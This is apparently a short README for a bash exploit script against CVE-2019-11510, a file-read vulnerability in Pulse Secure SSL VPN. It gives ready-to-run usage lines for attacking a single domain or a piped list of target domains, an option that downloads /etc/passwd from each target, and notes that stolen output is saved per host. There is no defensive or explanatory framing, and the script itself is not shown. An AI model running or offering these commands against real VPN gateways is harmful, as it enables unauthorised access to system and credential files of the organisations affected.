Exploit for Arbitrary File Read on Pulse Secure SSL VPN (CVE-2019-11510)

Exploit for Arbitrary File Read on Pulse Secure SSL VPN (CVE-2019-11510)

You can use a single domain, either a list of domains. You must include https:// in front of the domain.

Usage : cat targetlist.txt | bash CVE-2019-11510.sh / bash CVE-2019-11510.sh -d https://vpn.target.com/

If you want to just verify the exploit and download /etc/passwd then use :

cat targetlist.txt | bash CVE-2019-11510.sh --only-etc-passwd

bash CVE-2019-11510.sh -d https://vpn.target.com/ --only-etc-passwd

Output will be saved inside output/vpn.target.com/

https://www.exploit-db.com/exploits/47297